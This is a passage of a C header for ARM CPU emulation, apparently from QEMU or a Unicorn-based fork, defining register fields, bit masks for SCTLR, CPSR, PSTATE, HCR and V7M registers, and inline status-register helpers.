init_svtor; /* Uniprocessor system with MP extensions */ bool mp_is_up; /* True if we tried kvm_arm_host_cpu_features() during CPU instance_init * and the probe failed (so we need to report the error in realize) */ bool host_cpu_probe_failed; /* Specify the number of cores in this CPU cluster. Used for the L2CTLR * register. */ int32_t core_count; /* The instance init functions for implementation-specific subclasses * set these fields to specify the implementation-dependent values of * various constant registers and reset values of non-constant * registers. * Some of these might become QOM properties eventually. * Field names match the official register names as defined in the * ARMv7AR ARM Architecture Reference Manual. A reset_ prefix * is used for reset values of non-constant registers; no reset_ * prefix means a constant register. * Some of these registers are split out into a substructure that * is shared with the translators to control the ISA. * * Note that if you add an ID register to the ARMISARegisters struct * you need to also update the 32-bit and 64-bit versions of the * kvm_arm_get_host_cpu_features() function to correctly populate the * field by reading the value from the KVM vCPU. 
*/ struct ARMISARegisters { uint32_t id_isar0; uint32_t id_isar1; uint32_t id_isar2; uint32_t id_isar3; uint32_t id_isar4; uint32_t id_isar5; uint32_t id_isar6; uint32_t id_mmfr0; uint32_t id_mmfr1; uint32_t id_mmfr2; uint32_t id_mmfr3; uint32_t id_mmfr4; uint32_t mvfr0; uint32_t mvfr1; uint32_t mvfr2; uint32_t id_dfr0; uint32_t dbgdidr; uint64_t id_aa64isar0; uint64_t id_aa64isar1; uint64_t id_aa64pfr0; uint64_t id_aa64pfr1; uint64_t id_aa64mmfr0; uint64_t id_aa64mmfr1; uint64_t id_aa64mmfr2; uint64_t id_aa64dfr0; uint64_t id_aa64dfr1; } isar; uint32_t midr; uint32_t revidr; uint32_t reset_fpsid; uint32_t ctr; uint32_t reset_sctlr; uint32_t id_pfr0; uint32_t id_pfr1; uint64_t pmceid0; uint64_t pmceid1; uint32_t id_afr0; uint64_t id_aa64afr0; uint64_t id_aa64afr1; uint32_t clidr; uint64_t mp_affinity; /* MP ID without feature bits */ /* The elements of this array are the CCSIDR values for each cache, * in the order L1DCache, L1ICache, L2DCache, L2ICache, etc. */ uint64_t ccsidr[16]; uint64_t reset_cbar; uint32_t reset_auxcr; bool reset_hivecs; /* DCZ blocksize, in log_2(words), ie low 4 bits of DCZID_EL0 */ uint32_t dcz_blocksize; uint64_t rvbar; /* Configurable aspects of GIC cpu interface (which is part of the CPU) */ int gic_num_lrs; /* number of list registers */ int gic_vpribits; /* number of virtual priority bits */ int gic_vprebits; /* number of virtual preemption bits */ /* Whether the cfgend input is high (i.e. this CPU should reset into * big-endian mode). This setting isn't used directly: instead it modifies * the reset_sctlr value to have SCTLR_B or SCTLR_EE set, depending on the * architecture version. */ bool cfgend; QLIST_HEAD(, ARMELChangeHook) pre_el_change_hooks; QLIST_HEAD(, ARMELChangeHook) el_change_hooks; int32_t node_id; /* NUMA node this CPU belongs to */ /* Used to synchronize KVM and QEMU in-kernel device levels */ uint8_t device_irq_level; /* Used to set the maximum vector length the cpu will support. */ uint32_t sve_max_vq; /* * In sve_vq_map each set bit is a supported vector length of * (bit-number + 1) * 16 bytes, i.e. each bit number + 1 is the vector * length in quadwords. * * While processing properties during initialization, corresponding * sve_vq_init bits are set for bits in sve_vq_map that have been * set by properties. */ DECLARE_BITMAP(sve_vq_map, ARM_MAX_VQ); DECLARE_BITMAP(sve_vq_init, ARM_MAX_VQ); /* Generic timer counter frequency, in Hz */ uint64_t gt_cntfrq_hz; struct ARMCPUClass cc; }; unsigned int gt_cntfrq_period_ns(ARMCPU *cpu); void arm_cpu_do_interrupt(CPUState *cpu); void arm_v7m_cpu_do_interrupt(CPUState *cpu); bool arm_cpu_exec_interrupt(CPUState *cpu, int int_req); hwaddr arm_cpu_get_phys_page_attrs_debug(CPUState *cpu, vaddr addr, MemTxAttrs *attrs); /* * Helpers to dynamically generates XML descriptions of the sysregs * and SVE registers. Returns the number of registers in each set. */ int arm_gen_dynamic_sysreg_xml(CPUState *cpu, int base_reg); int arm_gen_dynamic_svereg_xml(CPUState *cpu, int base_reg); #ifdef TARGET_AARCH64 void aarch64_sve_narrow_vq(CPUARMState *env, unsigned vq); void aarch64_sve_change_el(CPUARMState *env, int old_el, int new_el, bool el0_a64); void aarch64_add_sve_properties(void *obj); /* * SVE registers are encoded in KVM's memory in an endianness-invariant format. * The byte at offset i from the start of the in-memory representation contains * the bits [(7 + 8 * i) : (8 * i)] of the register value. 
Since this means the * lowest offsets are stored in the lowest memory addresses, it nearly * matches QEMU's representation, which is to use an array of host-endian * uint64_t's, where the lower offsets are at the lower indices. To complete * the translation we just need to byte swap the uint64_t's on big-endian hosts. */ static inline uint64_t *sve_bswap64(uint64_t *dst, uint64_t *src, int nr) { #ifdef HOST_WORDS_BIGENDIAN int i; for (i = 0; i < nr; ++i) { dst[i] = bswap64(src[i]); } return dst; #else return src; #endif } #else static inline void aarch64_sve_narrow_vq(CPUARMState *env, unsigned vq) { } static inline void aarch64_sve_change_el(CPUARMState *env, int o, int n, bool a) { } static inline void aarch64_add_sve_properties(void *obj) { } #endif target_ulong do_arm_semihosting(CPUARMState *env); void aarch64_sync_32_to_64(CPUARMState *env); void aarch64_sync_64_to_32(CPUARMState *env); int fp_exception_el(CPUARMState *env, int cur_el); int sve_exception_el(CPUARMState *env, int cur_el); uint32_t sve_zcr_len_for_el(CPUARMState *env, int el); static inline bool is_a64(CPUARMState *env) { return env->aarch64; } /* You can call this signal handler from your SIGBUS and SIGSEGV signal handlers to inform the virtual CPU of exceptions. Non-zero is returned if the signal was handled by the virtual CPU. */ int cpu_arm_signal_handler(int host_signum, void *pinfo, void *puc); /** * pmu_op_start/finish * @env: CPUARMState * * Convert all PMU counters between their delta form (the typical mode when * they are enabled) and the guest-visible values. These two calls must * surround any action which might affect the counters. */ void pmu_op_start(CPUARMState *env); void pmu_op_finish(CPUARMState *env); /* * Called when a PMU counter is due to overflow */ void arm_pmu_timer_cb(void *opaque); /** * Functions to register as EL change hooks for PMU mode filtering */ void pmu_pre_el_change(ARMCPU *cpu, void *ignored); void pmu_post_el_change(ARMCPU *cpu, void *ignored); /* * pmu_init * @cpu: ARMCPU * * Initialize the CPU's PMCEID[01]_EL0 registers and associated internal state * for the current configuration */ void pmu_init(ARMCPU *cpu); /* SCTLR bit meanings. Several bits have been reused in newer * versions of the architecture; in that case we define constants * for both old and new bit meanings. Code which tests against those * bits should probably check or otherwise arrange that the CPU * is the architectural version it expects.
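 *
 * As an illustrative sketch (not part of this header, and assuming the
 * SCTLR_* constants defined just below): a caller testing a reused bit
 * should gate on the architecture version first, since e.g. bit 7 is
 * SCTLR_B up to v6 but SCTLR_ITD from v8 onward.
 */
#if 0 /* Illustrative only; hypothetical helper, not compiled. */
static inline bool sctlr_itd_set_v8(CPUARMState *env, uint64_t sctlr)
{
    /* Only meaningful on v8: on older cores the same bit is SCTLR_B. */
    return arm_feature(env, ARM_FEATURE_V8) && (sctlr & SCTLR_ITD);
}
#endif
/*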
*/ #define SCTLR_M (1U << 0) #define SCTLR_A (1U << 1) #define SCTLR_C (1U << 2) #define SCTLR_W (1U << 3) /* up to v6; RAO in v7 */ #define SCTLR_nTLSMD_32 (1U << 3) /* v8.2-LSMAOC, AArch32 only */ #define SCTLR_SA (1U << 3) /* AArch64 only */ #define SCTLR_P (1U << 4) /* up to v5; RAO in v6 and v7 */ #define SCTLR_LSMAOE_32 (1U << 4) /* v8.2-LSMAOC, AArch32 only */ #define SCTLR_SA0 (1U << 4) /* v8 onward, AArch64 only */ #define SCTLR_D (1U << 5) /* up to v5; RAO in v6 */ #define SCTLR_CP15BEN (1U << 5) /* v7 onward */ #define SCTLR_L (1U << 6) /* up to v5; RAO in v6 and v7; RAZ in v8 */ #define SCTLR_nAA (1U << 6) /* when v8.4-LSE is implemented */ #define SCTLR_B (1U << 7) /* up to v6; RAZ in v7 */ #define SCTLR_ITD (1U << 7) /* v8 onward */ #define SCTLR_S (1U << 8) /* up to v6; RAZ in v7 */ #define SCTLR_SED (1U << 8) /* v8 onward */ #define SCTLR_R (1U << 9) /* up to v6; RAZ in v7 */ #define SCTLR_UMA (1U << 9) /* v8 onward, AArch64 only */ #define SCTLR_F (1U << 10) /* up to v6 */ #define SCTLR_SW (1U << 10) /* v7 */ #define SCTLR_EnRCTX (1U << 10) /* in v8.0-PredInv */ #define SCTLR_Z (1U << 11) /* in v7, RES1 in v8 */ #define SCTLR_EOS (1U << 11) /* v8.5-ExS */ #define SCTLR_I (1U << 12) #define SCTLR_V (1U << 13) /* AArch32 only */ #define SCTLR_EnDB (1U << 13) /* v8.3, AArch64 only */ #define SCTLR_RR (1U << 14) /* up to v7 */ #define SCTLR_DZE (1U << 14) /* v8 onward, AArch64 only */ #define SCTLR_L4 (1U << 15) /* up to v6; RAZ in v7 */ #define SCTLR_UCT (1U << 15) /* v8 onward, AArch64 only */ #define SCTLR_DT (1U << 16) /* up to ??, RAO in v6 and v7 */ #define SCTLR_nTWI (1U << 16) /* v8 onward */ #define SCTLR_HA (1U << 17) /* up to v7, RES0 in v8 */ #define SCTLR_BR (1U << 17) /* PMSA only */ #define SCTLR_IT (1U << 18) /* up to ??, RAO in v6 and v7 */ #define SCTLR_nTWE (1U << 18) /* v8 onward */ #define SCTLR_WXN (1U << 19) #define SCTLR_ST (1U << 20) /* up to ??, RAZ in v6 */ #define SCTLR_UWXN (1U << 20) /* v7 onward, AArch32 only */ #define SCTLR_FI (1U << 21) /* up to v7, v8 RES0 */ #define SCTLR_IESB (1U << 21) /* v8.2-IESB, AArch64 only */ #define SCTLR_U (1U << 22) /* up to v6, RAO in v7 */ #define SCTLR_EIS (1U << 22) /* v8.5-ExS */ #define SCTLR_XP (1U << 23) /* up to v6; v7 onward RAO */ #define SCTLR_SPAN (1U << 23) /* v8.1-PAN */ #define SCTLR_VE (1U << 24) /* up to v7 */ #define SCTLR_E0E (1U << 24) /* v8 onward, AArch64 only */ #define SCTLR_EE (1U << 25) #define SCTLR_L2 (1U << 26) /* up to v6, RAZ in v7 */ #define SCTLR_UCI (1U << 26) /* v8 onward, AArch64 only */ #define SCTLR_NMFI (1U << 27) /* up to v7, RAZ in v7VE and v8 */ #define SCTLR_EnDA (1U << 27) /* v8.3, AArch64 only */ #define SCTLR_TRE (1U << 28) /* AArch32 only */ #define SCTLR_nTLSMD_64 (1U << 28) /* v8.2-LSMAOC, AArch64 only */ #define SCTLR_AFE (1U << 29) /* AArch32 only */ #define SCTLR_LSMAOE_64 (1U << 29) /* v8.2-LSMAOC, AArch64 only */ #define SCTLR_TE (1U << 30) /* AArch32 only */ #define SCTLR_EnIB (1U << 30) /* v8.3, AArch64 only */ #define SCTLR_EnIA (1U << 31) /* v8.3, AArch64 only */ #define SCTLR_BT0 (1ULL << 35) /* v8.5-BTI */ #define SCTLR_BT1 (1ULL << 36) /* v8.5-BTI */ #define SCTLR_ITFSB (1ULL << 37) /* v8.5-MemTag */ #define SCTLR_TCF0 (3ULL << 38) /* v8.5-MemTag */ #define SCTLR_TCF (3ULL << 40) /* v8.5-MemTag */ #define SCTLR_ATA0 (1ULL << 42) /* v8.5-MemTag */ #define SCTLR_ATA (1ULL << 43) /* v8.5-MemTag */ #define SCTLR_DSSBS (1ULL << 44) /* v8.5 */ #define CPTR_TCPAC (1U << 31) #define CPTR_TTA (1U << 20) #define CPTR_TFP (1U << 10) #define CPTR_TZ (1U << 8) /* 
CPTR_EL2 */ #define CPTR_EZ (1U << 8) /* CPTR_EL3 */ #define MDCR_EPMAD (1U << 21) #define MDCR_EDAD (1U << 20) #define MDCR_SPME (1U << 17) /* MDCR_EL3 */ #define MDCR_HPMD (1U << 17) /* MDCR_EL2 */ #define MDCR_SDD (1U << 16) #define MDCR_SPD (3U << 14) #define MDCR_TDRA (1U << 11) #define MDCR_TDOSA (1U << 10) #define MDCR_TDA (1U << 9) #define MDCR_TDE (1U << 8) #define MDCR_HPME (1U << 7) #define MDCR_TPM (1U << 6) #define MDCR_TPMCR (1U << 5) #define MDCR_HPMN (0x1fU) /* Not all of the MDCR_EL3 bits are present in the 32-bit SDCR */ #define SDCR_VALID_MASK (MDCR_EPMAD | MDCR_EDAD | MDCR_SPME | MDCR_SPD) #define CPSR_M (0x1fU) #define CPSR_T (1U << 5) #define CPSR_F (1U << 6) #define CPSR_I (1U << 7) #define CPSR_A (1U << 8) #define CPSR_E (1U << 9) #define CPSR_IT_2_7 (0xfc00U) #define CPSR_GE (0xfU << 16) #define CPSR_IL (1U << 20) #define CPSR_PAN (1U << 22) #define CPSR_J (1U << 24) #define CPSR_IT_0_1 (3U << 25) #define CPSR_Q (1U << 27) #define CPSR_V (1U << 28) #define CPSR_C (1U << 29) #define CPSR_Z (1U << 30) #define CPSR_N (1U << 31) #define CPSR_NZCV (CPSR_N | CPSR_Z | CPSR_C | CPSR_V) #define CPSR_AIF (CPSR_A | CPSR_I | CPSR_F) #define CPSR_IT (CPSR_IT_0_1 | CPSR_IT_2_7) #define CACHED_CPSR_BITS (CPSR_T | CPSR_AIF | CPSR_GE | CPSR_IT | CPSR_Q \ | CPSR_NZCV) /* Bits writable in user mode. */ #define CPSR_USER (CPSR_NZCV | CPSR_Q | CPSR_GE) /* Execution state bits. MRS read as zero, MSR writes ignored. */ #define CPSR_EXEC (CPSR_T | CPSR_IT | CPSR_J | CPSR_IL) /* Bit definitions for M profile XPSR. Most are the same as CPSR. */ #define XPSR_EXCP 0x1ffU #define XPSR_SPREALIGN (1U << 9) /* Only set in exception stack frames */ #define XPSR_IT_2_7 CPSR_IT_2_7 #define XPSR_GE CPSR_GE #define XPSR_SFPA (1U << 20) /* Only set in exception stack frames */ #define XPSR_T (1U << 24) /* Not the same as CPSR_T ! */ #define XPSR_IT_0_1 CPSR_IT_0_1 #define XPSR_Q CPSR_Q #define XPSR_V CPSR_V #define XPSR_C CPSR_C #define XPSR_Z CPSR_Z #define XPSR_N CPSR_N #define XPSR_NZCV CPSR_NZCV #define XPSR_IT CPSR_IT #define TTBCR_N (7U << 0) /* TTBCR.EAE==0 */ #define TTBCR_T0SZ (7U << 0) /* TTBCR.EAE==1 */ #define TTBCR_PD0 (1U << 4) #define TTBCR_PD1 (1U << 5) #define TTBCR_EPD0 (1U << 7) #define TTBCR_IRGN0 (3U << 8) #define TTBCR_ORGN0 (3U << 10) #define TTBCR_SH0 (3U << 12) #define TTBCR_T1SZ (3U << 16) #define TTBCR_A1 (1U << 22) #define TTBCR_EPD1 (1U << 23) #define TTBCR_IRGN1 (3U << 24) #define TTBCR_ORGN1 (3U << 26) #define TTBCR_SH1 (1U << 28) #define TTBCR_EAE (1U << 31) /* Bit definitions for ARMv8 SPSR (PSTATE) format. * Only these are valid when in AArch64 mode; in * AArch32 mode SPSRs are basically CPSR-format. 
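 *
 * A small illustrative sketch (not compiled) of how the CPSR masks above
 * compose; the 0x10u literal is the USR mode encoding, defined further down
 * in this header as ARM_CPU_MODE_USR:
 */
#if 0
#include <assert.h>
static void cpsr_mask_demo(void)
{
    uint32_t cpsr = CPSR_N | CPSR_C | 0x10u;         /* hypothetical value */
    assert((cpsr & CPSR_NZCV) == (CPSR_N | CPSR_C)); /* N,C set; Z,V clear */
    assert((cpsr & CPSR_M) == 0x10u);                /* mode field, bits [4:0] */
}
#endif
/*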
*/ #define PSTATE_SP (1U) #define PSTATE_M (0xFU) #define PSTATE_nRW (1U << 4) #define PSTATE_F (1U << 6) #define PSTATE_I (1U << 7) #define PSTATE_A (1U << 8) #define PSTATE_D (1U << 9) #define PSTATE_BTYPE (3U << 10) #define PSTATE_IL (1U << 20) #define PSTATE_SS (1U << 21) #define PSTATE_PAN (1U << 22) #define PSTATE_UAO (1U << 23) #define PSTATE_V (1U << 28) #define PSTATE_C (1U << 29) #define PSTATE_Z (1U << 30) #define PSTATE_N (1U << 31) #define PSTATE_NZCV (PSTATE_N | PSTATE_Z | PSTATE_C | PSTATE_V) #define PSTATE_DAIF (PSTATE_D | PSTATE_A | PSTATE_I | PSTATE_F) #define CACHED_PSTATE_BITS (PSTATE_NZCV | PSTATE_DAIF | PSTATE_BTYPE) /* Mode values for AArch64 */ #define PSTATE_MODE_EL3h 13 #define PSTATE_MODE_EL3t 12 #define PSTATE_MODE_EL2h 9 #define PSTATE_MODE_EL2t 8 #define PSTATE_MODE_EL1h 5 #define PSTATE_MODE_EL1t 4 #define PSTATE_MODE_EL0t 0 /* Write a new value to v7m.exception, thus transitioning into or out * of Handler mode; this may result in a change of active stack pointer. */ void write_v7m_exception(CPUARMState *env, uint32_t new_exc); /* Map EL and handler into a PSTATE_MODE. */ static inline unsigned int aarch64_pstate_mode(unsigned int el, bool handler) { return (el << 2) | handler; } /* Return the current PSTATE value. For the moment we don't support 32<->64 bit * interprocessing, so we don't attempt to sync with the cpsr state used by * the 32 bit decoder. */ static inline uint32_t pstate_read(CPUARMState *env) { int ZF; ZF = (env->ZF == 0); return (env->NF & 0x80000000) | (ZF << 30) | (env->CF << 29) | ((env->VF & 0x80000000) >> 3) | env->pstate | env->daif | (env->btype << 10); } static inline void pstate_write(CPUARMState *env, uint32_t val) { env->ZF = (~val) & PSTATE_Z; env->NF = val; env->CF = (val >> 29) & 1; env->VF = (val << 3) & 0x80000000; env->daif = val & PSTATE_DAIF; env->btype = (val >> 10) & 3; env->pstate = val & ~CACHED_PSTATE_BITS; } /* Return the current CPSR value. */ uint32_t cpsr_read(CPUARMState *env); typedef enum CPSRWriteType { CPSRWriteByInstr = 0, /* from guest MSR or CPS */ CPSRWriteExceptionReturn = 1, /* from guest exception return insn */ CPSRWriteRaw = 2, /* trust values, do not switch reg banks */ CPSRWriteByGDBStub = 3, /* from the GDB stub */ CPSRWriteByUnicorn = 4 /* from uc_reg_write */ } CPSRWriteType; /* Set the CPSR. Note that some bits of mask must be all-set or all-clear.*/ void cpsr_write(CPUARMState *env, uint32_t val, uint32_t mask, CPSRWriteType write_type); /* Return the current xPSR value. */ static inline uint32_t xpsr_read(CPUARMState *env) { int ZF; ZF = (env->ZF == 0); return (env->NF & 0x80000000) | (ZF << 30) | (env->CF << 29) | ((env->VF & 0x80000000) >> 3) | (env->QF << 27) | (env->thumb << 24) | ((env->condexec_bits & 3) << 25) | ((env->condexec_bits & 0xfc) << 8) | (env->GE << 16) | env->v7m.exception; } /* Set the xPSR. Note that some bits of mask must be all-set or all-clear. 
*/ static inline void xpsr_write(CPUARMState *env, uint32_t val, uint32_t mask) { if (mask & XPSR_NZCV) { env->ZF = (~val) & XPSR_Z; env->NF = val; env->CF = (val >> 29) & 1; env->VF = (val << 3) & 0x80000000; } if (mask & XPSR_Q) { env->QF = ((val & XPSR_Q) != 0); } if (mask & XPSR_GE) { env->GE = (val & XPSR_GE) >> 16; } if (mask & XPSR_T) { env->thumb = ((val & XPSR_T) != 0); } if (mask & XPSR_IT_0_1) { env->condexec_bits &= ~3; env->condexec_bits |= (val >> 25) & 3; } if (mask & XPSR_IT_2_7) { env->condexec_bits &= 3; env->condexec_bits |= (val >> 8) & 0xfc; } if (mask & XPSR_EXCP) { /* Note that this only happens on exception exit */ write_v7m_exception(env, val & XPSR_EXCP); } } #define HCR_VM (1ULL << 0) #define HCR_SWIO (1ULL << 1) #define HCR_PTW (1ULL << 2) #define HCR_FMO (1ULL << 3) #define HCR_IMO (1ULL << 4) #define HCR_AMO (1ULL << 5) #define HCR_VF (1ULL << 6) #define HCR_VI (1ULL << 7) #define HCR_VSE (1ULL << 8) #define HCR_FB (1ULL << 9) #define HCR_BSU_MASK (3ULL << 10) #define HCR_DC (1ULL << 12) #define HCR_TWI (1ULL << 13) #define HCR_TWE (1ULL << 14) #define HCR_TID0 (1ULL << 15) #define HCR_TID1 (1ULL << 16) #define HCR_TID2 (1ULL << 17) #define HCR_TID3 (1ULL << 18) #define HCR_TSC (1ULL << 19) #define HCR_TIDCP (1ULL << 20) #define HCR_TACR (1ULL << 21) #define HCR_TSW (1ULL << 22) #define HCR_TPCP (1ULL << 23) #define HCR_TPU (1ULL << 24) #define HCR_TTLB (1ULL << 25) #define HCR_TVM (1ULL << 26) #define HCR_TGE (1ULL << 27) #define HCR_TDZ (1ULL << 28) #define HCR_HCD (1ULL << 29) #define HCR_TRVM (1ULL << 30) #define HCR_RW (1ULL << 31) #define HCR_CD (1ULL << 32) #define HCR_ID (1ULL << 33) #define HCR_E2H (1ULL << 34) #define HCR_TLOR (1ULL << 35) #define HCR_TERR (1ULL << 36) #define HCR_TEA (1ULL << 37) #define HCR_MIOCNCE (1ULL << 38) /* RES0 bit 39 */ #define HCR_APK (1ULL << 40) #define HCR_API (1ULL << 41) #define HCR_NV (1ULL << 42) #define HCR_NV1 (1ULL << 43) #define HCR_AT (1ULL << 44) #define HCR_NV2 (1ULL << 45) #define HCR_FWB (1ULL << 46) #define HCR_FIEN (1ULL << 47) /* RES0 bit 48 */ #define HCR_TID4 (1ULL << 49) #define HCR_TICAB (1ULL << 50) #define HCR_AMVOFFEN (1ULL << 51) #define HCR_TOCU (1ULL << 52) #define HCR_ENSCXT (1ULL << 53) #define HCR_TTLBIS (1ULL << 54) #define HCR_TTLBOS (1ULL << 55) #define HCR_ATA (1ULL << 56) #define HCR_DCT (1ULL << 57) #define HCR_TID5 (1ULL << 58) #define HCR_TWEDEN (1ULL << 59) #define HCR_TWEDEL MAKE_64BIT_MASK(60, 4) #define SCR_NS (1U << 0) #define SCR_IRQ (1U << 1) #define SCR_FIQ (1U << 2) #define SCR_EA (1U << 3) #define SCR_FW (1U << 4) #define SCR_AW (1U << 5) #define SCR_NET (1U << 6) #define SCR_SMD (1U << 7) #define SCR_HCE (1U << 8) #define SCR_SIF (1U << 9) #define SCR_RW (1U << 10) #define SCR_ST (1U << 11) #define SCR_TWI (1U << 12) #define SCR_TWE (1U << 13) #define SCR_TLOR (1U << 14) #define SCR_TERR (1U << 15) #define SCR_APK (1U << 16) #define SCR_API (1U << 17) #define SCR_EEL2 (1U << 18) #define SCR_EASE (1U << 19) #define SCR_NMEA (1U << 20) #define SCR_FIEN (1U << 21) #define SCR_ENSCXT (1U << 25) #define SCR_ATA (1U << 26) /* Return the current FPSCR value. */ uint32_t vfp_get_fpscr(CPUARMState *env); void vfp_set_fpscr(CPUARMState *env, uint32_t val); /* FPCR, Floating Point Control Register * FPSR, Floating Point Status Register * * For A64 the FPSCR is split into two logically distinct registers, * FPCR and FPSR. However since they still use non-overlapping bits * we store the underlying state in fpscr and just mask on read/write.
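 *
 * A worked sketch of that masking (illustrative only; FPSR_MASK, FPCR_MASK
 * and the vfp_get_* accessors are defined just below):
 */
#if 0 /* Not compiled. */
static void fpscr_split_demo(CPUARMState *env)
{
    /* The two views cover disjoint bits of the underlying fpscr value... */
    QEMU_BUILD_BUG_ON(FPSR_MASK & FPCR_MASK);
    /* ...so merging the masked views loses nothing but the unused bits. */
    uint32_t merged = (vfp_get_fpsr(env) & FPSR_MASK) |
                      (vfp_get_fpcr(env) & FPCR_MASK);
    assert(merged == (vfp_get_fpscr(env) & (FPSR_MASK | FPCR_MASK)));
}
#endif
/*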
*/ #define FPSR_MASK 0xf800009f #define FPCR_MASK 0x07ff9f00 #define FPCR_IOE (1 << 8) /* Invalid Operation exception trap enable */ #define FPCR_DZE (1 << 9) /* Divide by Zero exception trap enable */ #define FPCR_OFE (1 << 10) /* Overflow exception trap enable */ #define FPCR_UFE (1 << 11) /* Underflow exception trap enable */ #define FPCR_IXE (1 << 12) /* Inexact exception trap enable */ #define FPCR_IDE (1 << 15) /* Input Denormal exception trap enable */ #define FPCR_FZ16 (1 << 19) /* ARMv8.2+, FP16 flush-to-zero */ #define FPCR_FZ (1 << 24) /* Flush-to-zero enable bit */ #define FPCR_DN (1 << 25) /* Default NaN enable bit */ #define FPCR_QC (1 << 27) /* Cumulative saturation bit */ static inline uint32_t vfp_get_fpsr(CPUARMState *env) { return vfp_get_fpscr(env) & FPSR_MASK; } static inline void vfp_set_fpsr(CPUARMState *env, uint32_t val) { uint32_t new_fpscr = (vfp_get_fpscr(env) & ~FPSR_MASK) | (val & FPSR_MASK); vfp_set_fpscr(env, new_fpscr); } static inline uint32_t vfp_get_fpcr(CPUARMState *env) { return vfp_get_fpscr(env) & FPCR_MASK; } static inline void vfp_set_fpcr(CPUARMState *env, uint32_t val) { uint32_t new_fpscr = (vfp_get_fpscr(env) & ~FPCR_MASK) | (val & FPCR_MASK); vfp_set_fpscr(env, new_fpscr); } enum arm_cpu_mode { ARM_CPU_MODE_USR = 0x10, ARM_CPU_MODE_FIQ = 0x11, ARM_CPU_MODE_IRQ = 0x12, ARM_CPU_MODE_SVC = 0x13, ARM_CPU_MODE_MON = 0x16, ARM_CPU_MODE_ABT = 0x17, ARM_CPU_MODE_HYP = 0x1a, ARM_CPU_MODE_UND = 0x1b, ARM_CPU_MODE_SYS = 0x1f }; /* VFP system registers. */ #define ARM_VFP_FPSID 0 #define ARM_VFP_FPSCR 1 #define ARM_VFP_MVFR2 5 #define ARM_VFP_MVFR1 6 #define ARM_VFP_MVFR0 7 #define ARM_VFP_FPEXC 8 #define ARM_VFP_FPINST 9 #define ARM_VFP_FPINST2 10 /* iwMMXt coprocessor control registers. */ #define ARM_IWMMXT_wCID 0 #define ARM_IWMMXT_wCon 1 #define ARM_IWMMXT_wCSSF 2 #define ARM_IWMMXT_wCASF 3 #define ARM_IWMMXT_wCGR0 8 #define ARM_IWMMXT_wCGR1 9 #define ARM_IWMMXT_wCGR2 10 #define ARM_IWMMXT_wCGR3 11 /* V7M CCR bits */ FIELD(V7M_CCR, NONBASETHRDENA, 0, 1) FIELD(V7M_CCR, USERSETMPEND, 1, 1) FIELD(V7M_CCR, UNALIGN_TRP, 3, 1) FIELD(V7M_CCR, DIV_0_TRP, 4, 1) FIELD(V7M_CCR, BFHFNMIGN, 8, 1) FIELD(V7M_CCR, STKALIGN, 9, 1) FIELD(V7M_CCR, STKOFHFNMIGN, 10, 1) FIELD(V7M_CCR, DC, 16, 1) FIELD(V7M_CCR, IC, 17, 1) FIELD(V7M_CCR, BP, 18, 1) /* V7M SCR bits */ FIELD(V7M_SCR, SLEEPONEXIT, 1, 1) FIELD(V7M_SCR, SLEEPDEEP, 2, 1) FIELD(V7M_SCR, SLEEPDEEPS, 3, 1) FIELD(V7M_SCR, SEVONPEND, 4, 1) /* V7M AIRCR bits */ FIELD(V7M_AIRCR, VECTRESET, 0, 1) FIELD(V7M_AIRCR, VECTCLRACTIVE, 1, 1) FIELD(V7M_AIRCR, SYSRESETREQ, 2, 1) FIELD(V7M_AIRCR, SYSRESETREQS, 3, 1) FIELD(V7M_AIRCR, PRIGROUP, 8, 3) FIELD(V7M_AIRCR, BFHFNMINS, 13, 1) FIELD(V7M_AIRCR, PRIS, 14, 1) FIELD(V7M_AIRCR, ENDIANNESS, 15, 1) FIELD(V7M_AIRCR, VECTKEY, 16, 16) /* V7M CFSR bits for MMFSR */ FIELD(V7M_CFSR, IACCVIOL, 0, 1) FIELD(V7M_CFSR, DACCVIOL, 1, 1) FIELD(V7M_CFSR, MUNSTKERR, 3, 1) FIELD(V7M_CFSR, MSTKERR, 4, 1) FIELD(V7M_CFSR, MLSPERR, 5, 1) FIELD(V7M_CFSR, MMARVALID, 7, 1) /* V7M CFSR bits for BFSR */ FIELD(V7M_CFSR, IBUSERR, 8 + 0, 1) FIELD(V7M_CFSR, PRECISERR, 8 + 1, 1) FIELD(V7M_CFSR, IMPRECISERR, 8 + 2, 1) FIELD(V7M_CFSR, UNSTKERR, 8 + 3, 1) FIELD(V7M_CFSR, STKERR, 8 + 4, 1) FIELD(V7M_CFSR, LSPERR, 8 + 5, 1) FIELD(V7M_CFSR, BFARVALID, 8 + 7, 1) /* V7M CFSR bits for UFSR */ FIELD(V7M_CFSR, UNDEFINSTR, 16 + 0, 1) FIELD(V7M_CFSR, INVSTATE, 16 + 1, 1) FIELD(V7M_CFSR, INVPC, 16 + 2, 1) FIELD(V7M_CFSR, NOCP, 16 + 3, 1) FIELD(V7M_CFSR, STKOF, 16 + 4, 1) FIELD(V7M_CFSR, UNALIGNED, 16 + 8, 1) FIELD(V7M_CFSR, 
DIVBYZERO, 16 + 9, 1) /* V7M CFSR bit masks covering all of the subregister bits */ FIELD(V7M_CFSR, MMFSR, 0, 8) FIELD(V7M_CFSR, BFSR, 8, 8) FIELD(V7M_CFSR, UFSR, 16, 16) /* V7M HFSR bits */ FIELD(V7M_HFSR, VECTTBL, 1, 1) FIELD(V7M_HFSR, FORCED, 30, 1) FIELD(V7M_HFSR, DEBUGEVT, 31, 1) /* V7M DFSR bits */ FIELD(V7M_DFSR, HALTED, 0, 1) FIELD(V7M_DFSR, BKPT, 1, 1) FIELD(V7M_DFSR, DWTTRAP, 2, 1) FIELD(V7M_DFSR, VCATCH, 3, 1) FIELD(V7M_DFSR, EXTERNAL, 4, 1) /* V7M SFSR bits */ FIELD(V7M_SFSR, INVEP, 0, 1) FIELD(V7M_SFSR, INVIS, 1, 1) FIELD(V7M_SFSR, INVER, 2, 1) FIELD(V7M_SFSR, AUVIOL, 3, 1) FIELD(V7M_SFSR, INVTRAN, 4, 1) FIELD(V7M_SFSR, LSPERR, 5, 1) FIELD(V7M_SFSR, SFARVALID, 6, 1) FIELD(V7M_SFSR, LSERR, 7, 1) /* v7M MPU_CTRL bits */ FIELD(V7M_MPU_CTRL, ENABLE, 0, 1) FIELD(V7M_MPU_CTRL, HFNMIENA, 1, 1) FIELD(V7M_MPU_CTRL, PRIVDEFENA, 2, 1) /* v7M CLIDR bits */ FIELD(V7M_CLIDR, CTYPE_ALL, 0, 21) FIELD(V7M_CLIDR, LOUIS, 21, 3) FIELD(V7M_CLIDR, LOC, 24, 3) FIELD(V7M_CLIDR, LOUU, 27, 3) FIELD(V7M_CLIDR, ICB, 30, 2) FIELD(V7M_CSSELR, IND, 0, 1) FIELD(V7M_CSSELR, LEVEL, 1, 3) /* We use the combination of InD and Level to index into 